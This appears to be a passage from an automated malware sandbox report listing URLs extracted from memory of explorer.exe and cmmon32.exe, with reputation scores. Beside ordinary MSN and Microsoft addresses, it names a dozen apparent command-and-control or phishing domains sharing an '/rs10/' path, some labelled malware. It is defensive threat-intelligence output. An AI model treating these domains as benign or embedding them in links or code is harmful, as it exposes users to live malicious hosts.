http://www.rewmio.xyz/rs10/www.totalkfood.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://api.msn.com/v1/news/Feed/Windows?activityId=3B22F7CF85C14EF68AA6229BF5B3705E&timeOut=5000&oc	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3	explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
https://activity.windows.com/UserActivity.ReadWrite.CreatedByAppexe	explorer.exe, 00000003.00000003.2192098195.00000000089B8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.00000000089B8000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/health/medical/mayo-clinic-minute-who-benefits-from-taking-statins/ar-AA1h	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.zg9tywlubmftzw5ldzi0mdm.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.rd.com/list/best-cities-by-generation/	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.robertjamesfineclothing.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	9%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.calm-plants.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cryptarrow.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.cleaning-products-29334.bond/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.guillaumecarreau.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.totalkfood.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13pwi3-dark	explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.cryptarrow.com/rs10/www.starryallure.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
http://www.roundaboutlogistics.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.autoitscript.com/autoit3/J	explorer.exe, 00000003.00000000.1325855618.0000000006A6C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193101829.0000000006AD5000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/news/us/counterpoint-individual-parents-rights-do-not-translate-to-a-licen	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.omarshafie.online	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.roundaboutlogistics.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.m-baer.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	6%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://www.mtauratarnt.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://word.office.com	explorer.exe, 00000003.00000000.1327499164.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083531825.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3804772422.00000000087FE000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2192098195.00000000087FE000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.cryptarrow.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/money/realestate/my-husband-and-i-paid-off-our-mortgage-more-than-15-years	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.nightoracle.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.starryallure.com/rs10/www.roundaboutlogistics.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://buy.live.com/	explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT-dark	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.guillaumecarreau.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://login.microsoftonline.co	explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: phishing	unknown
http://www.hdlive7.live/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.robertjamesfineclothing.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.robertjamesfineclothing.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://outlook.com	explorer.exe, 00000003.00000000.1327499164.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3081706085.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3805799384.0000000008903000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2192098195.0000000008903000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.mtauratarnt.com/rs10/www.robertjamesfineclothing.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.cloudflare.com/5xx-error-landing	explorer.exe, 00000003.00000002.3812069415.0000000010A6F000.00000004.80000000.00040000.00000000.sdmp, cmmon32.exe, 00000004.00000002.3797952972.0000000004DAF000.00000004.10000000.00040000.00000000.sdmp	false		high
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gMeu	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.robertjamesfineclothing.com/rs10/www.cleaning-products-29334.bond	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.mtauratarnt.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://android.notify.windows.com/iOS	explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/lifestyle/home-and-garden/10-vital-home-maintenance-tasks-you-ll-regret-if	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.m-baer.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.m-baer.comReferer:	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.m-baer.com/rs10/www.rewmio.xyz	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.fhstbanknigeria.com/rs10/www.m-baer.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://api.msn.com/v1/news/Feed/Windows?	explorer.exe, 00000003.00000002.3804772422.000000000866C000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1327499164.000000000866C000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.rewmio.xyz/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: phishing	unknown
https://passwordreset.micros	explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13fcaT	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.totalkfood.com/rs10/www.cryptarrow.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.activedirectory.	explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/kinzinger-has-theory-about-who-next-house-speaker-will-be/vi	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.hdlive7.live	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/money/careersandeducation/student-loan-debt-forgiveness-arrives-for-some-b	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://schemas.micro	explorer.exe, 00000003.00000002.3797222750.00000000027F0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1327213978.0000000007F70000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1326487164.0000000007320000.00000002.00000001.00040000.00000000.sdmp	false	URL Reputation: safe	unknown
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.guillaumecarreau.com/rs10/www.omarshafie.online	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://wns.windows.com/EM0	explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	false		high
https://www.msn.com/en-us/weather/topstories/us-winter-forecast-for-the-2023-2024-season/ar-AA1hGINt	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.totalkfood.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.guillaumecarreau.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.fhstbanknigeria.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.starryallure.com	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://android.notify.windows.com/iOSdX	explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	false		high
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.nightoracle.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
http://www.starryallure.com/rs10/	explorer.exe, 00000003.00000003.2192829066.000000000BEFC000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085003429.000000000BF06000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3083447074.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: malware	unknown
https://www.msn.com/en-us/news/politics/vote-to-oust-mccarthy-is-a-warning-sign-for-democracy-schola	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
http://www.omarshafie.online/rs10/	explorer.exe, 00000003.00000002.3811089962.000000000BEFB000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://account.li	explorer.exe, 00000003.00000002.3809058677.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1330984779.000000000BA75000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2193304285.000000000BA75000.00000004.00000001.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o	explorer.exe, 00000003.00000002.3800695222.000000000695E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1325855618.0000000006968000.00000004.00000001.00020000.00000000.sdmp	false		high
